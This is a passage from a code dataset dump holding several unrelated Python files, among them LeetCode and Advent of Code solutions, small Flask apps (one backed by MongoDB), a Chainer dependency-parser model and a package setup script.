(ie, from left to right, level by level from leaf to root).\nFor example:\nGiven binary tree [3,9,20,null,null,15,7],\n 3\n / \\\n 9 20\n / \\\n 15 7\n\nreturn its bottom-up level order traversal as:\n[\n [15,7],\n [9,20],\n [3]\n]\n'''\n\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\n\nclass Solution:\n def levelOrderBottom(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: List[List[int]]\n \"\"\"\n result = []\n if root is None:\n return result\n\n from collections import deque\n queue = deque()\n queue.append(root)\n\n while len(queue) > 0:\n previousLevelCount = len(queue)\n current = []\n for i in range(previousLevelCount):\n ele = queue.popleft()\n current.append(ele.val)\n if ele.left:\n queue.append(ele.left)\n if ele.right:\n queue.append(ele.right)\n result.append(current)\n\n return result[::-1]\n","sub_path":"tree/binary_tree_level_order_traversal_ii.py","file_name":"binary_tree_level_order_traversal_ii.py","file_ext":"py","file_size_in_byte":1277,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"67267574","text":"from oo_step_by_step.step1.person import Person\n\n\nclass Teacher(Person):\n\n def __init__(self, name, age, klass) -> None:\n super().__init__(name, age)\n self.klass = klass\n\n def introduce(self):\n result = super().introduce() + \" I am a Teacher.\"\n if self.klass != None:\n result += \" I teach {self.klass}.\".format(self=self)\n else:\n result += \" I teach No Class.\"\n return result\n\n","sub_path":"oo_step_by_step/step2/teacher.py","file_name":"teacher.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"260877494","text":"# Goofy Goobers: Julia Nelson, Oscar Wang, Owen Yaggy\n# SoftDev\n# K10: Putting Little Pieces Together\n# 2021-10-05\n\nfrom flask import Flask\nimport random\nimport csv\napp = Flask(__name__) #create instance of class Flask\n\ndef openCSV(fname):\n # creates an empty dictionary and sets the temp_total and total to 0\n dict = {}\n temp_total = 0\n total = 0\n with open(fname) as f:\n # ensures that the column headers are not included in the dictionary \n f.readline()\n reader = csv.reader(f, delimiter=',')\n for row in reader:\n # separately saves the total of the probabilities for each occupation\n if 'Total' in row:\n total = float(row[1])\n else:\n # populates dictionary 'dict' with (key: value) pairs that represent\n # occupations and their probabilities\n dict[row[0]] = float(row[1])\n # keeps track of consecutive sum of the values\n temp_total += float(row[1])\n # if a total is not given, sets it to the sum of the value\n if total == 0:\n total = temp_total\n return dict, total\n\n# picks an occupation based on the weighted percentages\ndef picker():\n jobDict, total = openCSV('occupations.csv')\n # we multiply the total by 10 for random.randint() to produce an int to \n # simulate randomly selecting an occupation\n total = total * 10\n # stores a list of occupations and their corresponding probabilities in \n # two separate lists\n nums = list(jobDict.values())\n occ = list(jobDict.keys())\n conDict = {}\n sum = 0\n # populates conDict such that each (key: value) pair represents the occupation\n # and 10 times the sum of the probabilities preceding that occupation\n for i in range(len(nums)):\n nums[i] *= 10.0\n sum += nums[i]\n nums[i] = sum\n for i in range(len(occ)):\n 
conDict[occ[i]] = nums[i]\n\n # picks a random int from 0 (inclusive) to the total (exclusive) so that each unit of probability corresponds to exactly one possible integer\n n = random.randint(0, total-1)\n # returns the occupation if its probability is within range of the consecutive sum\n for i in conDict:\n if (n < conDict[i]):\n return i\n\n# runs n trials to determine if the probability of the resulting occupations matches \n# those listed in the .csv file\ndef test_probs(n):\n testResults, total = openCSV('occupations.csv')\n for i in testResults:\n testResults[i] = 0\n for i in range(n):\n testResults[picker()] += 1\n for i in testResults:\n testResults[i] = [testResults[i], round(testResults[i] / n * 10000) / 100]\n print(testResults)\n\n# returns an HTML list of the occupations\ndef getList():\n testResults, total = openCSV('occupations.csv')\n HTMLList = '''\n      <ul>\n '''\n occupations = testResults.keys()\n for i in occupations:\n HTMLList += f\"<li>{i}</li>\\n\"\n HTMLList += \"</ul>\"\n return HTMLList\n\n\n@app.route(\"/\") #assign fxn to route\ndef display(): #code to display the HTML on the webpage\n output = f'''\n <html>\n <body>\n Goofy Goobers: Julia Nelson, Oscar Wang, Owen Yaggy\n <br>\n SoftDev\n <br>\n K10: Putting Little Pieces Together\n <br>\n 2021-10-05\n <br>
    \n \n \n Your randomized output: {picker()} {getList()}\n \n '''\n return output\n\napp.debug = True\napp.run()","sub_path":"10_flask/occupy_flask_st/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3460,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"220745687","text":"# normal function\ndef func(names, reverse_str = False):\n \n if reverse_str:\n names = [name[::-1] for name in names]\n names = [name.capitalize() for name in names]\n return names\n\n# kwargs function\ndef func_kwargs(names, **kwargs):\n\n if kwargs.get('reverse_str') == True:\n names = [name[::-1] for name in names]\n names = [name.capitalize() for name in names]\n return names\n\n\n\n\nnames = ['imad', 'alex'] \n\nprint(func(names))\nprint(func(names, reverse_str = True))\n\nprint(func_kwargs(names))\nprint(func_kwargs(names, reverse_str = True))","sub_path":"detailed-exercises/77-exercise.py","file_name":"77-exercise.py","file_ext":"py","file_size_in_byte":566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"354014663","text":"import chainer\nimport chainer.functions as F\nimport chainer_nn.functions as nn_F\nimport chainer_nn.links as nn_L\nimport numpy as np\n\nfrom common import mst\n\n\n\"\"\"\nNOTE: Weight Initialization comparison\n - A. This Implementation\n - URL: https://github.com/chantera/biaffineparser\n - Framework: Chainer (v5.2)\n - Initialization:\n - Embeddings (word): zero + pretrained (normalized with std)\n - Embeddings (postag): random_normal\n - BiLSTMs: `chainer.links.NStepBiLSTM` default\n (W: N(0,sqrt(1/w_in)), b: zero)\n - MLPs: W: N(0,sqrt(1/w_out)), b: zero\n - Biaffines: zero\n - B. Original\n - URL: https://github.com/tdozat/Parser-v1\n \n - Framework: TensorFlow ( (v0.5.0)\n - Path: scripts/parsing/\n - See also: https://github.com/jcyk/Dynet-Biaffine-dependency-parser\n - Framework: MXNet (>=v1.3.0)\n - Initialization:\n - Embeddings (word): zero + pretrained (normalized with std)\n - Embeddings (postag): random_normal\n - BiLSTMs: W: orthonormal_initializer, b: zero (forget gate bias: -1.0)\n - MLPs: W: orthonormal_initializer, b: zero\n - Biaffines: zero\n - D. StanfordNLP\n - URL: https://github.com/stanfordnlp/stanfordnlp\n (v0.1.0)\n - Path: stanfordnlp/models/depparse/\n - Note: This is the implementation of the following paper:\n [http://aclweb.org/anthology/K18-2016]\n - Framework: PyTorch (v1.0)\n - Initialization: *They also used additional embeddings.\n - Embeddings (word): `torch.nn.Embeddings` default (N(0,1)) + pretrained\n - Embeddings (postag): `torch.nn.Embeddings` default\n - BiLSTMs: `torch.nn.LSTM` default\n (uniform(-s,s) for both W and b where s=sqrt(1/hidden_size))\n - MLPs: `torch.nn.Linear` default\n (uniform(-s,s) for both W and b where s=sqrt(1/fan_in))\n - Biaffines: zero\n - E. NeuroNLP2\n - URL: https://github.com/XuezheMax/NeuroNLP2\n \n - Note: This is the implementation of the following paper:\n [http://www.aclweb.org/anthology/P18-1130]\n - Framework: PyTorch (v0.3)\n - Initialization: *They also used character embeddings.\n - Embeddings (word): pretrained only (no use of trainable embeddings)\n - Embeddings (postag): uniform(-s,s) where s=sqrt(3/dim)\n - BiLSTMs: W: uniform(-s,s) for where s=sqrt(1/hidden_size), b: zero\n - MLPs: `torch.nn.Linear` default\n - Biffines: U,W1,W2: xavier_uniform, b: zero\n - F. 
AllenNLP\n - URL: https://github.com/allenai/allennlp\n (v0.8.1)\n - Path: allennlp/models/biaffine_dependency_parser.py\n - Framework: PyTorch (v1.0 or v0.4.1)\n - Initialization: The configurations is not available.\n\"\"\"\n\n\nclass BiaffineParser(chainer.Chain):\n\n def __init__(self, n_rels, encoder,\n arc_mlp_units=500, rel_mlp_units=100,\n arc_mlp_dropout=0.0, rel_mlp_dropout=0.0):\n super().__init__()\n if isinstance(arc_mlp_units, int):\n arc_mlp_units = [arc_mlp_units]\n if isinstance(rel_mlp_units, int):\n rel_mlp_units = [rel_mlp_units]\n with self.init_scope():\n def mlp_activate(x):\n # return F.maximum(0.1 * x, x) # original\n return F.leaky_relu(x, slope=0.1)\n self.encoder = encoder\n h_dim = self.encoder.out_size\n init_mlp = chainer.initializers.HeNormal(\n scale=np.sqrt(0.5), fan_option='fan_out')\n self.mlp_arc_head = nn_L.MLP([nn_L.MLP.Layer(\n arc_mlp_units[i - 1] if i > 0 else h_dim, u, mlp_activate,\n arc_mlp_dropout, initialW=init_mlp,\n initial_bias=0.) for i, u in enumerate(arc_mlp_units)])\n self.mlp_arc_dep = self.mlp_arc_head.copy(mode='init')\n self.mlp_rel_head = nn_L.MLP([nn_L.MLP.Layer(\n rel_mlp_units[i - 1] if i > 0 else h_dim, u, mlp_activate,\n rel_mlp_dropout, initialW=init_mlp,\n initial_bias=0.) for i, u in enumerate(rel_mlp_units)])\n self.mlp_rel_dep = self.mlp_rel_head.copy(mode='init')\n init_biaf = chainer.initializers.Zero()\n self.biaf_arc = nn_L.Biaffine(\n arc_mlp_units[-1], arc_mlp_units[-1], 1,\n nobias=(False, True, True),\n initialW=init_biaf, initial_bias=0.)\n self.biaf_rel = nn_L.Biaffine(\n rel_mlp_units[-1], rel_mlp_units[-1], n_rels,\n nobias=(False, False, False),\n initialW=init_biaf, initial_bias=0.)\n self._results = {}\n\n def forward(self, words, pretrained_words, postags, *args):\n self._results.clear()\n # [n; B], [n; B], [n; B] => (B, n_max, d)\n hs = self.encode(words, pretrained_words, postags)\n hs_arc_h = self.mlp_arc_head(hs, n_batch_axes=2)\n hs_arc_d = self.mlp_arc_dep(hs, n_batch_axes=2)\n hs_rel_h = self.mlp_rel_head(hs, n_batch_axes=2)\n hs_rel_d = self.mlp_rel_dep(hs, n_batch_axes=2)\n logits_arc = F.squeeze(self.biaf_arc(hs_arc_d, hs_arc_h), axis=3)\n self._mask = self.xp.asarray(_mask_arc(\n logits_arc, self._lengths, mask_loop=not chainer.config.train))\n self._logits_arc = logits_arc + (1. 
- self._mask) * -1e8\n self._logits_rel = self.biaf_rel(hs_rel_d, hs_rel_h)\n # => (B, n_max, n_max), (B, n_max, n_max, n_rels)\n return self._logits_arc, self._logits_rel\n\n def encode(self, *args):\n self._hs, self._lengths = self.encoder(*args[:3])\n return self._hs\n\n def parse(self, words, pretrained_words, postags, use_cache=True):\n with chainer.no_backprop_mode():\n if len(self._results) == 0 or not use_cache:\n self.forward(words, pretrained_words, postags)\n arcs = _parse_by_graph(self._logits_arc, self._lengths, self._mask)\n rels = _decode_rels(self._logits_rel, arcs, self._lengths)\n arcs = [arcs_i[:n] for arcs_i, n in zip(arcs, self._lengths)]\n rels = [rels_i[:n] for rels_i, n in zip(rels, self._lengths)]\n parsed = list(zip(arcs, rels))\n return parsed\n\n def compute_loss(self, y, t):\n self._results = _compute_metrics(y, t, self._lengths, False)\n return self._results['arc_loss'] + self._results['rel_loss']\n\n def compute_accuracy(self, y, t, use_cache=True):\n arc_accuracy = self._results.get('arc_accuracy', None)\n rel_accuracy = self._results.get('rel_accuracy', None)\n if not use_cache or (arc_accuracy is None and rel_accuracy is None):\n results = _compute_metrics(y, t, self._lengths, False)\n arc_accuracy = results.get('arc_accuracy', None)\n rel_accuracy = results.get('rel_accuracy', None)\n self._results.update({\n 'arc_accuracy': arc_accuracy,\n 'rel_accuracy': rel_accuracy,\n })\n return arc_accuracy, rel_accuracy\n\n\ndef _mask_arc(logits_arc, lengths, mask_loop=True):\n mask = np.zeros(logits_arc.shape, dtype=np.float32)\n for i, length in enumerate(lengths):\n mask[i, :length, :length] = 1.\n if mask_loop:\n mask *= (1. - np.eye(logits_arc.shape[2], dtype=np.float32))\n return mask\n\n\ndef _parse_by_graph(logits_arc, lengths, mask=None):\n probs = F.softmax(logits_arc, axis=2).data\n if mask is not None:\n probs *= mask\n probs = chainer.cuda.to_cpu(probs)\n trees = np.full((len(lengths), max(lengths)), -1, dtype=np.int32)\n for i, (probs_i, length) in enumerate(zip(probs, lengths)):\n trees[i, 1:length] = mst.mst(probs_i[:length, :length])[0][1:]\n return trees\n\n\ndef _decode_rels(logits_rel, trees, lengths, root=0):\n steps = np.arange(trees.shape[1])\n logits_rel = [logits_rel[i, steps, arcs] for i, arcs in enumerate(trees)]\n logits_rel = F.stack(logits_rel, axis=0).data\n logits_rel[:, :, root] = -1e8\n rels = logits_rel.argmax(axis=2)\n rels = chainer.cuda.to_cpu(rels)\n for rels_i, arcs_i in zip(rels, trees):\n rels_i[:] = np.where(arcs_i == 0, root, rels_i)\n rels[:, 0] = -1\n return rels\n\n\ndef _compute_metrics(parsed, gold_batch, lengths,\n use_predicted_arcs_for_rels=True):\n logits_arc, logits_rel, *_ = parsed\n true_arcs, true_rels, *_ = zip(*gold_batch)\n\n # exclude attachment from the root\n logits_arc, logits_rel = logits_arc[:, 1:], logits_rel[:, 1:]\n true_arcs = F.pad_sequence(true_arcs, padding=-1)[:, 1:]\n true_rels = F.pad_sequence(true_rels, padding=-1)[:, 1:]\n lengths = np.array(lengths, dtype=np.int32) - 1\n xp = chainer.cuda.get_array_module(logits_arc)\n if xp is not np:\n true_arcs.to_gpu()\n true_rels.to_gpu()\n\n b, n_deps, n_heads = logits_arc.shape\n logits_arc_flatten = F.reshape(logits_arc, (b * n_deps, n_heads))\n true_arcs_flatten = F.reshape(true_arcs, (b * n_deps,))\n arc_loss = F.softmax_cross_entropy(\n logits_arc_flatten, true_arcs_flatten, ignore_label=-1)\n arc_accuracy = _accuracy(\n logits_arc_flatten, true_arcs_flatten, ignore_label=-1)\n\n if use_predicted_arcs_for_rels:\n parsed_arcs = 
xp.argmax(logits_arc.data, axis=2)\n else:\n parsed_arcs = true_arcs.data\n parsed_arcs = chainer.cuda.to_cpu(parsed_arcs)\n b, n_deps, n_heads, n_rels = logits_rel.shape\n base1, base2 = n_deps * n_heads, np.arange(n_deps) * n_heads\n parsed_arcs_flatten = np.concatenate(\n [base1 * i + base2 + arcs for i, arcs in enumerate(parsed_arcs)])\n logits_rel_flatten = F.embed_id(\n xp.asarray(parsed_arcs_flatten),\n F.reshape(logits_rel, (b * base1, n_rels)))\n true_rels_flatten = F.reshape(true_rels, (b * n_deps,))\n rel_loss = F.softmax_cross_entropy(\n logits_rel_flatten, true_rels_flatten, ignore_label=-1)\n rel_accuracy = _accuracy(\n logits_rel_flatten, true_rels_flatten, ignore_label=-1)\n\n return {'arc_loss': arc_loss, 'arc_accuracy': arc_accuracy,\n 'rel_loss': rel_loss, 'rel_accuracy': rel_accuracy}\n\n\ndef _accuracy(y, t, ignore_label=None):\n if isinstance(y, chainer.Variable):\n y = y.data\n if isinstance(t, chainer.Variable):\n t = t.data\n xp = chainer.cuda.get_array_module(y)\n pred = y.argmax(axis=1).reshape(t.shape)\n if ignore_label is not None:\n mask = (t == ignore_label)\n ignore_cnt = mask.sum()\n pred = xp.where(mask, ignore_label, pred)\n count = (pred == t).sum() - ignore_cnt\n total = t.size - ignore_cnt\n else:\n count = (pred == t).sum()\n total = t.size\n return count, total\n\n\nclass Encoder(chainer.Chain):\n\n def __init__(self,\n word_embeddings,\n pretrained_word_embeddings=None,\n postag_embeddings=None,\n n_lstm_layers=3,\n lstm_hidden_size=None,\n embeddings_dropout=0.0,\n lstm_dropout=0.0,\n recurrent_dropout=0.0):\n super().__init__()\n with self.init_scope():\n self._use_pretrained_word = self._use_postag = False\n embeddings = [(word_embeddings, False)] # (weights, fixed)\n lstm_in_size = word_embeddings.shape[1]\n if pretrained_word_embeddings is not None:\n embeddings.append((pretrained_word_embeddings, True))\n self._use_pretrained_word = True\n if postag_embeddings is not None:\n embeddings.append((postag_embeddings, False))\n lstm_in_size += postag_embeddings.shape[1]\n self._use_postag = True\n embed_list = []\n for weights, fixed in embeddings:\n s = weights.shape\n embed_list.append(\n nn_L.EmbedID(s[0], s[1], weights, None, fixed))\n self.embeds = nn_L.EmbedList(\n embed_list, dropout=0.0, merge=False, split=False)\n if lstm_hidden_size is None:\n lstm_hidden_size = lstm_in_size\n # NOTE(chantera): The original implementation uses BiLSTM\n # with variational dropout for inputs and hidden states.\n # The same dropout is applied by the following code:\n # ---\n # self.bilstm = nn.NStepBiLSTM(\n # n_lstm_layers, lstm_in_size, lstm_hidden_size, lstm_dropout,\n # recurrent_dropout, use_variational_dropout=True)\n self.bilstm = nn_L.NStepBiLSTM(\n n_lstm_layers, lstm_in_size, lstm_hidden_size, lstm_dropout,\n recurrent_dropout, use_variational_dropout=False)\n self.embeddings_dropout = embeddings_dropout\n self.lstm_dropout = lstm_dropout\n self._hidden_size = lstm_hidden_size\n\n def forward(self, *xs):\n # [(n, d_word); B], [(n, d_word); B], [(n, d_pos); B]\n lengths = np.array([x.size for x in xs[0]], np.int32)\n rs, boundaries = self.embeds(*xs)\n rs = self._concat_embeds(rs, self.embeddings_dropout)\n # => [(n, d_word + d_pos); B]\n if np.all(lengths == lengths[0]):\n boundaries = len(lengths)\n rs = F.split_axis(\n nn_F.dropout(rs, self.lstm_dropout), boundaries, axis=0)\n hs = self.bilstm(hx=None, cx=None, xs=rs)[-1]\n hs = nn_F.dropout(F.pad_sequence(hs), self.lstm_dropout)\n return hs, lengths\n\n def _concat_embeds(self, embed_outputs, 
dropout=0.0):\n rs_postags = embed_outputs.pop() if self._use_postag else None\n rs_words_pretrained = embed_outputs.pop() \\\n if self._use_pretrained_word else None\n rs_words = embed_outputs.pop()\n if rs_words_pretrained is not None:\n rs_words += rs_words_pretrained\n rs = [rs_words]\n if rs_postags is not None:\n rs.append(rs_postags)\n # NOTE(chantera): The original implementation uses\n # embeddings dropout as below.\n # ---\n # rs = _embed_dropout_v1(\n # rs[0], rs[1] if len(rs) > 1 else None, dropout)\n rs = _embed_dropout_v2(rs, dropout)\n if len(rs) > 1:\n rs = F.concat(rs)\n else:\n rs = rs[0]\n return rs\n\n @property\n def out_size(self):\n return self._hidden_size * 2\n\n\ndef _embed_dropout_v1(rs_words, rs_postags=None,\n word_dropout=0.0, postag_dropout=0.0):\n \"\"\"\n Drop words and tags with scaling to compensate the dropped one.\n https://github.com/tdozat/Parser-v1/blob/0739216129cd39d69997d28cbc4133b360ea3934/lib/models/nn.py#L58 # NOQA\n \"\"\"\n if not chainer.config.train:\n return rs_words, rs_postags\n xp = chainer.cuda.get_array_module(rs_words)\n mask_shape = (rs_words.shape[0], 1)\n word_mask = xp.float32(1. - word_dropout) \\\n * (xp.random.rand(*mask_shape) >= word_dropout)\n if rs_postags is not None:\n postag_mask = xp.float32(1. - postag_dropout) \\\n * (xp.random.rand(*mask_shape) >= postag_dropout)\n word_embed_size = rs_words.shape[-1]\n postag_embed_size = rs_postags.shape[-1]\n embed_size = word_embed_size + postag_embed_size\n dropped_sizes = word_mask * word_embed_size \\\n + postag_mask * postag_embed_size\n if word_embed_size == postag_embed_size:\n embed_size += word_embed_size\n dropped_sizes += word_mask * postag_mask * word_embed_size\n scale = embed_size / (dropped_sizes + 1e-12)\n word_mask *= scale\n postag_mask *= scale\n ys_words = rs_words * word_mask\n if rs_postags is not None:\n ys_postags = rs_postags * postag_mask\n else:\n ys_postags = None\n return ys_words, ys_postags\n\n\ndef _embed_dropout_v2(xs, dropout=0.0):\n \"\"\"\n Drop representations with scaling.\n https://github.com/tdozat/Parser-v2/blob/304c638aa780a5591648ef27060cfa7e4bee2bd0/parser/neural/models/nn.py#L50 # NOQA\n \"\"\"\n if not chainer.config.train or dropout == 0.0:\n return xs\n xp = chainer.cuda.get_array_module(xs[0])\n masks = (xp.random.rand(len(xs), xs[0].shape[0]) >= dropout) \\\n .astype(xp.float32)\n scale = len(masks) / xp.maximum(xp.sum(masks, axis=0, keepdims=True), 1)\n masks = xp.expand_dims(masks * scale, axis=2)\n ys = [xs_each * mask for xs_each, mask in zip(xs, masks)]\n return ys\n","sub_path":"src/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":16969,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"86713269","text":"#!/usr/bin/env python3\n\n# --- Part Two ---\n\n# As a stress test on the system, the programs here clear the grid and then store the value 1 in square 1. 
Then, in the same allocation order as shown above, they store the sum of the values in all adjacent squares, including diagonals.\n\n# So, the first few squares' values are chosen as follows:\n\n# Square 1 starts with the value 1.\n# Square 2 has only one adjacent filled square (with value 1), so it also stores 1.\n# Square 3 has both of the above squares as neighbors and stores the sum of their values, 2.\n# Square 4 has all three of the aforementioned squares as neighbors and stores the sum of their values, 4.\n# Square 5 only has the first and fourth squares as neighbors, so it gets the value 5.\n# Once a square is written, its value does not change. Therefore, the first few squares would receive the following values:\n\n# 147 142 133 122 59\n# 304 5 4 2 57\n# 330 10 1 1 54\n# 351 11 23 25 26\n# 362 747 806---> ...\n# What is the first value written that is larger than your puzzle input?\n\nimport sys\n\nclass Direction:\n\tdef __init__(self, name, steps):\n\t\tself.name = name\n\t\tself.steps = steps\n\t\t\n\tdef increment(self, pos):\n\t\treturn (pos[0] + self.steps[0], pos[1] + self.steps[1])\n\nMATRIX_SIDE = 15\nDIRECTIONS = [\n\tDirection(\"East\", (+1, 0)),\n\tDirection(\"North\", (0, -1)),\n\tDirection(\"West\", (-1, 0)),\n\tDirection(\"South\", (0, +1))\n]\n\nfor target in sys.stdin:\n\ttarget = int(target)\n\n\tpos = (MATRIX_SIDE // 2, ) * 2\n\tmatrix = [[0] * MATRIX_SIDE for x in range(MATRIX_SIDE)]\n\tmatrix[pos[1]][pos[0]] = cellsum = 1\n\n\tdirection = 0\n\tdirection_steps = 1\n\tturns_until_increase = 2\n\tsteps_per_direction = 1\n\n\twhile cellsum < target:\n\t\tprint('%s %i %s %i %i %i' % (repr(pos), cellsum, DIRECTIONS[direction].name, direction_steps, turns_until_increase, steps_per_direction))\n\t\tpos = DIRECTIONS[direction].increment(pos)\n\t\tdirection_steps -= 1\n\t\tif direction_steps == 0:\n\t\t\tturns_until_increase -= 1\n\t\t\tif turns_until_increase == 0:\n\t\t\t\tsteps_per_direction += 1\n\t\t\t\tturns_until_increase = 2\n\n\t\t\tdirection_steps = steps_per_direction\n\t\t\tdirection = (direction + 1) % 4\n\n\t\tcellsum = 0\n\t\tfor y_rel in [-1, 0, 1]:\n\t\t\tfor x_rel in [-1, 0, 1]:\n\t\t\t\tcellsum += matrix[pos[1] + y_rel][pos[0] + x_rel]\n\t\t\t\t\t\t\n\t\tmatrix[pos[1]][pos[0]] = cellsum\n\n\tprint('%s %i %s %i %i %i' % (repr(pos), cellsum, DIRECTIONS[direction].name, direction_steps, turns_until_increase, steps_per_direction))\n","sub_path":"2017/day03_b.py","file_name":"day03_b.py","file_ext":"py","file_size_in_byte":2452,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"8966887","text":"from flask import Flask, render_template, request\nfrom bson.objectid import ObjectId\nimport os\nimport env\nimport pymongo\n\n\napp = Flask(__name__)\n\n\n# SET UP - WHAT CLUSTER/SEVER - WHAT DATABASE - WHAT COLLECTION\nMONGO_URI = os.environ.get(\"MONGO_URI\") # What machine to speak to, who I am and my password (+ what database I want to deal with)\nDBS_NAME = \"myFirstMDB\" # What database (serie of \"tables\")\nCOLLECTION_NAME = \"movies\" # What collection (what table)\n\n\n# CONNECTING TO IT\ndef mongo_connect(url):\n try:\n conn = pymongo.MongoClient(url)\n print(\"Mongo is connected!\")\n return conn\n except pymongo.errors.ConnectionFailure as e:\n print(\"Could not connect to MongoDB: %s\") % e\n\n\n# REPRESENTS THE DATABASE SERVER\nconn = mongo_connect(MONGO_URI)\n# REPRESENTS THE COLLECTION\ncoll = conn[DBS_NAME][COLLECTION_NAME]\n\n\n@app.route(\"/\")\ndef home():\n return 
render_template('hello.html')\n\n\n# CRUD - Create, Read, Update, Delete\n\n\n# CREATE\n@app.route(\"/create\", methods=[\"GET\", \"POST\"])\ndef create():\n\n    if request.method == 'GET':\n        return render_template('create.html')\n\n    if request.method == 'POST':\n        # GET THE DATA FROM MY FORM (COMING FROM THE CLIENT)\n        title = request.form['title']\n        release_year = request.form['release_year']\n        synopsis = request.form['synopsis']\n\n        # BUILD MY NEW DOC TO CREATE\n        my_wonderful_new_document = {'title': title,\n                                     'release_year': release_year,\n                                     'synopsis': synopsis}\n\n        # SEND IT TO THE DATABASE\n        coll.insert_one(my_wonderful_new_document)\n\n        return render_template('created.html', document=my_wonderful_new_document)\n\n\n# READ\n@app.route(\"/read\")\ndef read():\n    documents = coll.find()\n    return render_template('read.html', documents=documents)\n\n\n@app.route(\"/read/<search>\")\ndef read_one(search):\n    print('~~~~~~~~~~~~~~~~~~~')\n    print(search)\n    doc = coll.find_one({'title': search})\n    return render_template('found.html', doc=doc)\n\n\n# UPDATE\n@app.route(\"/update\")\ndef update():\n\n    # What doc do I want to target for an update ?\n    id_ = \"...\"\n    what_doc = {'_id': ObjectId(id_)}\n\n    # What is the new content for that document ?\n    doc_content = {'title': 'Pulp Fiction',\n                   'release_year': '1994',\n                   'synopsis': 'A gangster movie'}\n\n    # update it\n    coll.update(what_doc, doc_content)\n\n    return render_template('update.html')\n\n\n# DELETE\n@app.route('/delete')\ndef delete():\n\n    # What doc do I want to target for a delete ?\n    id_ = \"...\"\n    what_doc = {'_id': ObjectId(id_)}\n\n    # remove it\n    coll.remove(what_doc)\n\n    return render_template('delete.html')\n\n\nif __name__ == '__main__':\n    app.run(host='0.0.0.0',\n            port=5000,\n            debug=True)","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2877,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"522631132","text":"from setuptools import setup, find_packages\n\nimport sys\n\nversion = open(\"version.txt\").read().rstrip()\nrequirements = [k.strip() for k in open(\"requirements.txt\").read().split()]\n\nsetup(\n    name='gridtk',\n    version=version,\n    description='Parallel Job Manager',\n    long_description=open('README.rst').read(),\n    url='https://gitlab.idiap.ch/bob/gridtk',\n    license='GPLv3',\n\n    author='Manuel Guenther,Andre Anjos',\n    author_email='manuel.guenther@idiap.ch,andre.anjos@idiap.ch',\n\n    packages=find_packages(),\n    include_package_data=True,\n\n    install_requires=requirements,\n\n    entry_points={\n        'console_scripts': [\n            'jman = gridtk.script.jman:main',\n            'jgen = gridtk.script.jgen:main',\n            'grid = gridtk.script.grid:main',\n\n            # program replacements\n            'qstat.py = gridtk.script.grid:main',\n            'qdel.py = gridtk.script.grid:main',\n            'qsub.py = gridtk.script.grid:main',\n            'man.py = gridtk.script.grid:main',\n        ],\n\n    },\n\n    classifiers = [\n        'Development Status :: 4 - Beta',\n        'Intended Audience :: Developers',\n        'License :: OSI Approved :: GNU General Public License v3 (GPLv3)',\n        'Natural Language :: English',\n        'Programming Language :: Python',\n        'Programming Language :: Python :: 3',\n        'Topic :: System :: Clustering',\n    ]\n)\n","sub_path":"pypi_install_script/gridtk-1.6.5/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"154174632","text":"\"\"\"11. 
Container With Most Water\nhttps://leetcode.com/problems/container-with-most-water/\n\nGiven n non-negative integers a1, a2, ..., an , where each represents a point\nat coordinate (i, ai). n vertical lines are drawn such that the two endpoints\nof the line i is at (i, ai) and (i, 0). Find two lines, which, together with\nthe x-axis forms a container, such that the container contains the most water.\n\nNotice that you may not slant the container.\n\nExample 1:\nInput: height = [1,8,6,2,5,4,8,3,7]\nOutput: 49\nExplanation: The above vertical lines are represented by array\n[1,8,6,2,5,4,8,3,7]. In this case, the max area of water (blue section) the\ncontainer can contain is 49.\n\nExample 2:\nInput: height = [1,1]\nOutput: 1\n\nExample 3:\nInput: height = [4,3,2,1,4]\nOutput: 16\n\nExample 4:\nInput: height = [1,2,1]\nOutput: 2\n\n\nExample 5:\nInput: height = [2,3,4,5,18,17,6]\nOutput: 17\n\n\"\"\"\n\nclass Solution:\n    def max_area(self, height: list[int]) -> int:\n        max_vol = 0\n        i = 0\n        j = len(height) - 1\n        while i < j:\n            if height[i] <= height[j]:\n                vol = (j - i) * height[i]\n                i += 1\n            else:\n                vol = (j - i) * height[j]\n                j -= 1\n            max_vol = max(max_vol, vol)\n        return max_vol\n\n# Runtime: 676 ms, faster than 5.25% of Python3 online submissions\n# Memory Usage: 28 MB, less than 20.63% of Python3 online submissions\n\n\nif __name__ == '__main__':\n    my_solution = Solution()\n    height = [1,8,6,2,5,4,8,3,7]\n    # height = [1,8,6,2,5,4,16,3,10]\n    # height = [1, 1]\n    # height = [4, 3, 2, 1, 4]\n    # height = [1, 2, 1]\n    # height = [2, 3, 4, 5, 18, 17, 6]\n    print(\"height: {}\".format(height))\n    print(\"result: {}\".format(my_solution.max_area(height)))\n","sub_path":"00/10-19/0011-container-with-most-water/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"4253728","text":"import pandas as pd\nfrom time import gmtime, strftime\nimport datetime as dt\nclass Interview_question:\n    def __init__(self,filename,company,link,type):\n        self.filename = filename\n        self.company = company\n        self.link = link\n        self.type = type\n        self.starttime = None\n        self.endtime = None\n        self.spendtime = None\n    \n    def setTime(self):\n        FMT = \"%Y-%m-%d %H:%M:%S\"\n        if self.starttime is None:\n            self.starttime = strftime(FMT, gmtime())\n        elif self.endtime is None:\n            self.endtime = strftime(FMT, gmtime())\n            spend = dt.datetime.strptime(self.endtime, FMT) - dt.datetime.strptime(self.starttime, FMT)\n            self.spendtime = spend.total_seconds()/60\n    \n    def to_csv(self):\n   